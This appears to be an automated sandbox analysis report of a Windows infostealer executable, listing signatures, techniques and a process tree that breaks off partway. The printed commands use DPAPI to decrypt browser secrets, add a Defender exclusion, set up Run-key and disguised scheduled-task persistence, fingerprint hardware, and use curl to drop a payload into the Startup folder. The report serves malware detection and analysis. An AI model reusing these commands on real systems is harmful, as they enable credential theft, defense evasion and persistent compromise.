7afdfc51e20e5f336761b4a1964a8949428dff7b96ea8389c4db9383afe2e336

Analysis

max time kernel
93s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2024, 07:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Size

37.6MB
MD5

dbcc5cfb5b91fae4370930affd3d7ef9
SHA1

5e5598375c5abeee8c18c9c28a5138e3763df29b
SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
SHA512

0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
28	2488	curl.exe
35	3316	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4532	powershell.exe
4008	powershell.exe
2932	powershell.exe
1940	powershell.exe
4944	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

pid	Process
3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\EWgXseaKvVpGoBI.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
1196	cmd.exe
4364	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1624	schtasks.exe

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1816	WMIC.exe
4908	WMIC.exe
316	WMIC.exe
2488	WMIC.exe
3212	WMIC.exe
4428	WMIC.exe
2496	WMIC.exe
3888	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
1580	tasklist.exe
1772	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1044	reg.exe
2884	reg.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
4532	powershell.exe
4532	powershell.exe
3564	powershell.exe
3564	powershell.exe
740	powershell.exe
740	powershell.exe
4944	powershell.exe
4944	powershell.exe
2932	powershell.exe
2932	powershell.exe
2932	powershell.exe
2488	powershell.exe
2488	powershell.exe
2488	powershell.exe
1940	powershell.exe
1940	powershell.exe
2336	powershell.exe
2336	powershell.exe
4308	powershell.exe
4308	powershell.exe
4008	powershell.exe
4008	powershell.exe
2524	powershell.exe
2524	powershell.exe
3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
1692	powershell.exe
1692	powershell.exe
3692	powershell.exe
3692	powershell.exe
4816	powershell.exe
4816	powershell.exe
2336	powershell.exe
2336	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	1580	tasklist.exe
Token: SeDebugPrivilege	1772	tasklist.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeIncreaseQuotaPrivilege	1488	WMIC.exe
Token: SeSecurityPrivilege	1488	WMIC.exe
Token: SeTakeOwnershipPrivilege	1488	WMIC.exe
Token: SeLoadDriverPrivilege	1488	WMIC.exe
Token: SeSystemProfilePrivilege	1488	WMIC.exe
Token: SeSystemtimePrivilege	1488	WMIC.exe
Token: SeProfSingleProcessPrivilege	1488	WMIC.exe
Token: SeIncBasePriorityPrivilege	1488	WMIC.exe
Token: SeCreatePagefilePrivilege	1488	WMIC.exe
Token: SeBackupPrivilege	1488	WMIC.exe
Token: SeRestorePrivilege	1488	WMIC.exe
Token: SeShutdownPrivilege	1488	WMIC.exe
Token: SeDebugPrivilege	1488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1488	WMIC.exe
Token: SeRemoteShutdownPrivilege	1488	WMIC.exe
Token: SeUndockPrivilege	1488	WMIC.exe
Token: SeManageVolumePrivilege	1488	WMIC.exe
Token: 33	1488	WMIC.exe
Token: 34	1488	WMIC.exe
Token: 35	1488	WMIC.exe
Token: 36	1488	WMIC.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeIncreaseQuotaPrivilege	1488	WMIC.exe
Token: SeSecurityPrivilege	1488	WMIC.exe
Token: SeTakeOwnershipPrivilege	1488	WMIC.exe
Token: SeLoadDriverPrivilege	1488	WMIC.exe
Token: SeSystemProfilePrivilege	1488	WMIC.exe
Token: SeSystemtimePrivilege	1488	WMIC.exe
Token: SeProfSingleProcessPrivilege	1488	WMIC.exe
Token: SeIncBasePriorityPrivilege	1488	WMIC.exe
Token: SeCreatePagefilePrivilege	1488	WMIC.exe
Token: SeBackupPrivilege	1488	WMIC.exe
Token: SeRestorePrivilege	1488	WMIC.exe
Token: SeShutdownPrivilege	1488	WMIC.exe
Token: SeDebugPrivilege	1488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1488	WMIC.exe
Token: SeRemoteShutdownPrivilege	1488	WMIC.exe
Token: SeUndockPrivilege	1488	WMIC.exe
Token: SeManageVolumePrivilege	1488	WMIC.exe
Token: 33	1488	WMIC.exe
Token: 34	1488	WMIC.exe
Token: 35	1488	WMIC.exe
Token: 36	1488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3184	WMIC.exe
Token: SeSecurityPrivilege	3184	WMIC.exe
Token: SeTakeOwnershipPrivilege	3184	WMIC.exe
Token: SeLoadDriverPrivilege	3184	WMIC.exe
Token: SeSystemProfilePrivilege	3184	WMIC.exe
Token: SeSystemtimePrivilege	3184	WMIC.exe
Token: SeProfSingleProcessPrivilege	3184	WMIC.exe
Token: SeIncBasePriorityPrivilege	3184	WMIC.exe
Token: SeCreatePagefilePrivilege	3184	WMIC.exe
Token: SeBackupPrivilege	3184	WMIC.exe
Token: SeRestorePrivilege	3184	WMIC.exe
Token: SeShutdownPrivilege	3184	WMIC.exe
Token: SeDebugPrivilege	3184	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3184	WMIC.exe
Token: SeRemoteShutdownPrivilege	3184	WMIC.exe
Token: SeUndockPrivilege	3184	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3512 wrote to memory of 856	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	87
PID 3512 wrote to memory of 856	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	87
PID 856 wrote to memory of 4016	856	cmd.exe	88
PID 856 wrote to memory of 4016	856	cmd.exe	88
PID 856 wrote to memory of 4532	856	cmd.exe	89
PID 856 wrote to memory of 4532	856	cmd.exe	89
PID 4532 wrote to memory of 3716	4532	powershell.exe	90
PID 4532 wrote to memory of 3716	4532	powershell.exe	90
PID 3716 wrote to memory of 3220	3716	csc.exe	91
PID 3716 wrote to memory of 3220	3716	csc.exe	91
PID 3512 wrote to memory of 2480	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	92
PID 3512 wrote to memory of 2480	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	92
PID 3512 wrote to memory of 4788	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	93
PID 3512 wrote to memory of 4788	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	93
PID 2480 wrote to memory of 4636	2480	cmd.exe	94
PID 2480 wrote to memory of 4636	2480	cmd.exe	94
PID 4788 wrote to memory of 1580	4788	cmd.exe	95
PID 4788 wrote to memory of 1580	4788	cmd.exe	95
PID 3512 wrote to memory of 1448	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	97
PID 3512 wrote to memory of 1448	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	97
PID 3512 wrote to memory of 1196	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	98
PID 3512 wrote to memory of 1196	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	98
PID 1448 wrote to memory of 1772	1448	cmd.exe	99
PID 1448 wrote to memory of 1772	1448	cmd.exe	99
PID 1196 wrote to memory of 3564	1196	cmd.exe	100
PID 1196 wrote to memory of 3564	1196	cmd.exe	100
PID 3512 wrote to memory of 4364	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	101
PID 3512 wrote to memory of 4364	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	101
PID 4364 wrote to memory of 740	4364	cmd.exe	102
PID 4364 wrote to memory of 740	4364	cmd.exe	102
PID 3512 wrote to memory of 2992	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	103
PID 3512 wrote to memory of 2992	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	103
PID 3512 wrote to memory of 4432	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	104
PID 3512 wrote to memory of 4432	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	104
PID 3512 wrote to memory of 3428	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	105
PID 3512 wrote to memory of 3428	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	105
PID 2992 wrote to memory of 1488	2992	cmd.exe	106
PID 2992 wrote to memory of 1488	2992	cmd.exe	106
PID 3512 wrote to memory of 4476	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	107
PID 3512 wrote to memory of 4476	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	107
PID 3512 wrote to memory of 4720	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	108
PID 3512 wrote to memory of 4720	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	108
PID 4432 wrote to memory of 4372	4432	cmd.exe	109
PID 4432 wrote to memory of 4372	4432	cmd.exe	109
PID 3428 wrote to memory of 1624	3428	cmd.exe	148
PID 3428 wrote to memory of 1624	3428	cmd.exe	148
PID 4476 wrote to memory of 4944	4476	cmd.exe	111
PID 4476 wrote to memory of 4944	4476	cmd.exe	111
PID 4720 wrote to memory of 3872	4720	cmd.exe	112
PID 4720 wrote to memory of 3872	4720	cmd.exe	112
PID 3512 wrote to memory of 1616	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	113
PID 3512 wrote to memory of 1616	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	113
PID 1616 wrote to memory of 1676	1616	cmd.exe	114
PID 1616 wrote to memory of 1676	1616	cmd.exe	114
PID 3512 wrote to memory of 2724	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	115
PID 3512 wrote to memory of 2724	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	115
PID 2724 wrote to memory of 3184	2724	cmd.exe	116
PID 2724 wrote to memory of 3184	2724	cmd.exe	116
PID 3512 wrote to memory of 2704	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	117
PID 3512 wrote to memory of 2704	3512	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	117
PID 2704 wrote to memory of 3852	2704	cmd.exe	118
PID 2704 wrote to memory of 3852	2704	cmd.exe	118
PID 2704 wrote to memory of 2288	2704	cmd.exe	119
PID 2704 wrote to memory of 2288	2704	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:4016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4532
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xiju10fn\xiju10fn.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62C1.tmp" "c:\Users\Admin\AppData\Local\Temp\xiju10fn\CSC45A7967736F41368D8EAD1C77C2DBCF.TMP"
        5⤵
        
        PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4788
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1448
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:1196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3428
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4944
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gvvbzbj\1gvvbzbj.cmdline"
      4⤵
      PID:1380
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C95.tmp" "c:\Users\Admin\AppData\Local\Temp\1gvvbzbj\CSC9E2296725FE44F8B8536363721A053E.TMP"
        5⤵
        
        PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    PID:1676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:1084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1940
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1044
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:2884
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3852
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:1816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
